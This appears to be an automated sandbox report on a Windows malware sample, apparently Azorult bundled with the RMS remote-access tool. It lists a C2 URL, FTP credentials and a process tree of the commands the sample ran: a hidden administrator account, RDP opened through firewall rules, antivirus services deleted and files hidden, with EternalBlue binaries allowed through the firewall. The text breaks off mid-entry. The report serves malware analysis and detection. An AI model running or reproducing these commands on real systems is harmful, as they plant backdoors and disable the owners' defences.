Analysis

  • max time kernel
    147s
  • max time network
    170s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 16:58

General

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    109.248.203.81
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings ⋅ 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer ⋅ 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass ⋅ 3 TTPs
  • Windows security bypass ⋅ 2 TTPs
  • ACProtect 1.3x - 1.4x DLL software ⋅ 2 IoCs

    Detects file using ACProtect software.

  • Grants admin privileges ⋅ 1 TTPs

    Uses net.exe to modify the user's privileges.

  • ASPack v2.12-2.42 ⋅ 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory ⋅ 4 IoCs
  • Executes dropped EXE ⋅ 18 IoCs
  • Modifies Windows Firewall ⋅ 1 TTPs
  • Sets DLL path for service in the registry ⋅ 2 TTPs
  • Sets file to hidden ⋅ 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) ⋅ 3 TTPs
  • UPX packed file ⋅ 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL ⋅ 7 IoCs
  • Modifies file permissions ⋅ 1 TTPs 64 IoCs
  • Reads data files stored by FTP clients ⋅ 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients ⋅ 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients ⋅ 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers ⋅ 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting ⋅ 2 TTPs
  • Adds Run key to start application ⋅ 2 TTPs 4 IoCs
  • Checks installed software on the system ⋅ 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled ⋅ 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 ⋅ 1 TTPs
  • Looks up external IP address via web service ⋅ 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon ⋅ 2 TTPs 7 IoCs
  • Drops file in Program Files directory ⋅ 31 IoCs
  • Drops file in Windows directory ⋅ 8 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry ⋅ 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe ⋅ 9 IoCs
  • Gathers network information ⋅ 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill ⋅ 6 IoCs
  • Modifies registry class ⋅ 6 IoCs
  • NTFS ADS ⋅ 2 IoCs
  • Runs .reg file with regedit ⋅ 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses ⋅ 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam ⋅ 1 IoCs
  • Suspicious behavior: LoadsDriver ⋅ 2 IoCs
  • Suspicious behavior: SetClipboardViewer ⋅ 1 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 64 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 11 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 64 IoCs
  • System policy modification ⋅ 1 TTPs 3 IoCs
  • Views/modifies file attributes ⋅ 1 TTPs 31 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe
    "C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.exe"
    Drops file in Drivers directory
    Adds Run key to start application
    Checks whether UAC is enabled
    Modifies WinLogon
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of WriteProcessMemory
    System policy modification
    PID:644
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:1528
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:1836
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:3548
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2208
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:3860
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:356
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:2616
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:4032
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:2164
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:3916
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:2240
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:1544
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        PID:3304
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          Suspicious use of WriteProcessMemory
          PID:3928
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:3312
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:756
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:2408
    • C:\ProgramData\install\sys.exe
      C:\ProgramData\install\sys.exe
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious use of WriteProcessMemory
      PID:3028
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"
        Suspicious use of WriteProcessMemory
        PID:3124
        • C:\Windows\SysWOW64\timeout.exe
          C:\Windows\system32\timeout.exe 3
          Delays execution with timeout.exe
          PID:1028
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      PID:2180
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Drops file in Drivers directory
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        PID:1968
        • C:\Programdata\RealtekHD\taskhostw.exe
          C:\Programdata\RealtekHD\taskhostw.exe
          Executes dropped EXE
          Adds Run key to start application
          NTFS ADS
          Suspicious behavior: GetForegroundWindowSpam
          Suspicious use of SetWindowsHookEx
          PID:3356
          • C:\Programdata\WindowsTask\winlogon.exe
            C:\Programdata\WindowsTask\winlogon.exe
            Executes dropped EXE
            Suspicious use of SetWindowsHookEx
            PID:3160
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /C schtasks /query /fo list
              PID:2116
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /query /fo list
                PID:1872
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ipconfig /flushdns
            PID:4304
            • C:\Windows\system32\ipconfig.exe
              ipconfig /flushdns
              Gathers network information
              PID:4392
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c gpupdate /force
            PID:4432
            • C:\Windows\system32\gpupdate.exe
              gpupdate /force
              PID:4532
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
          PID:4048
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)
            Modifies file permissions
            PID:396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
          PID:3404
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)
            PID:1500
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
          PID:3840
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)
            PID:2060
        • C:\programdata\microsoft\intel\R8.exe
          C:\programdata\microsoft\intel\R8.exe
          Executes dropped EXE
          Modifies registry class
          Suspicious use of SetWindowsHookEx
          PID:820
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
            PID:3224
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
              Modifies registry class
              PID:2032
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:2036
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:3412
              • C:\Windows\SysWOW64\timeout.exe
                timeout 3
                Delays execution with timeout.exe
                PID:2148
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                PID:1532
              • C:\rdp\Rar.exe
                "Rar.exe" e -p555 db.rar
                Executes dropped EXE
                PID:3848
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im Rar.exe
                Kills process with taskkill
                PID:1932
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4156
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                PID:4820
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                  PID:4944
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                    PID:5032
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                    PID:5080
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                    PID:5108
                  • C:\Windows\SysWOW64\net.exe
                    net.exe user "john" "12345" /add
                    PID:4176
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 user "john" "12345" /add
                      PID:4128
                  • C:\Windows\SysWOW64\chcp.com
                    chcp 1251
                    PID:2572
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Администраторы" "John" /add
                    PID:4728
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                      PID:4180
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administratorzy" "John" /add
                    PID:4980
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                      PID:2288
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administrators" John /add
                    PID:5024
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administrators" John /add
                      PID:4380
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Administradores" John /add
                    PID:4684
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Administradores" John /add
                      PID:4636
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного рабочего стола" John /add
                    PID:4988
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                      PID:4524
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Пользователи удаленного управления" John /add
                    PID:4396
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                      PID:4280
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Remote Desktop Users" John /add
                    PID:4116
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                      PID:4596
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Usuarios de escritorio remoto" John /add
                    PID:748
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                      PID:864
                  • C:\Windows\SysWOW64\net.exe
                    net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                    PID:4552
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                      PID:4744
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -i -o
                    Executes dropped EXE
                    Modifies WinLogon
                    Drops file in Program Files directory
                    PID:4756
                    • C:\Windows\SYSTEM32\netsh.exe
                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                      PID:5960
                  • C:\rdp\RDPWInst.exe
                    "RDPWInst.exe" -w
                    Executes dropped EXE
                    PID:4672
                  • C:\Windows\SysWOW64\reg.exe
                    reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                    PID:4540
                  • C:\Windows\SysWOW64\net.exe
                    net accounts /maxpwage:unlimited
                    PID:4664
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 accounts /maxpwage:unlimited
                      PID:4616
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:1444
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\Program Files\RDP Wrapper"
                    Drops file in Program Files directory
                    Views/modifies file attributes
                    PID:4600
                  • C:\Windows\SysWOW64\attrib.exe
                    attrib +s +h "C:\rdp"
                    Views/modifies file attributes
                    PID:5236
              • C:\Windows\SysWOW64\timeout.exe
                timeout 2
                Delays execution with timeout.exe
                PID:4840
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          PID:752
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            PID:2220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          PID:1004
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            PID:3308
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          PID:3812
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            PID:1372
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          PID:3312
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            PID:3468
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          PID:2236
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            PID:3868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          PID:2348
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            PID:4108
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          PID:4168
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            PID:4220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          PID:4240
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            PID:4284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          PID:4348
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            PID:4404
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          PID:4440
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            PID:4520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete "windows node"
          PID:4580
          • C:\Windows\SysWOW64\sc.exe
            sc delete "windows node"
            PID:4624
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
          PID:4648
          • C:\Windows\SysWOW64\sc.exe
            sc stop Adobeflashplayer
            PID:4692
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
          PID:4716
          • C:\Windows\SysWOW64\sc.exe
            sc delete AdobeFlashPlayer
            PID:4872
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MoonTitle
          PID:4732
          • C:\Windows\SysWOW64\sc.exe
            sc stop MoonTitle
            PID:4900
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
          PID:4976
          • C:\Windows\SysWOW64\sc.exe
            sc delete MoonTitle"
            PID:5056
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
          PID:2260
          • C:\Windows\SysWOW64\sc.exe
            sc stop clr_optimization_v4.0.30318_64
            PID:1036
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
          PID:2720
          • C:\Windows\SysWOW64\sc.exe
            sc delete clr_optimization_v4.0.30318_64"
            PID:4200
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
          PID:4188
          • C:\Windows\SysWOW64\sc.exe
            sc stop MicrosoftMysql
            PID:4264
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
          PID:2204
          • C:\Windows\SysWOW64\sc.exe
            sc delete MicrosoftMysql
            PID:4528
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          PID:4400
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            PID:4556
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          PID:4376
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            PID:4480
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          PID:888
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            PID:4592
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          PID:4700
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            PID:4660
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          PID:4828
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            PID:4736
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4920
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:5088
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:5104
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4224
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:1140
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4260
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
          PID:4288
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
            PID:4492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
          PID:4340
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
            PID:4804
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
          PID:4748
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
            PID:4940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
          PID:4668
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
            PID:4772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
          PID:4204
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
            PID:4824
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
          PID:4244
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
            PID:4364
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
          PID:4212
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
            PID:4832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
          PID:4360
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
            PID:4800
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
          PID:4352
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
            PID:4908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
          PID:4704
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
            PID:4776
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
          PID:5068
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
            PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
          PID:2248
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
            PID:4104
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
          PID:4196
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
            PID:4688
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
          PID:4332
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.255
            PID:4852
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
          PID:3676
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.255
            PID:868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
          PID:4208
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.255
            PID:4584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
          PID:5084
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.255
            PID:4304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
          PID:4344
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.255
            PID:4928
        • C:\Windows\SysWOW64\cmd.exe
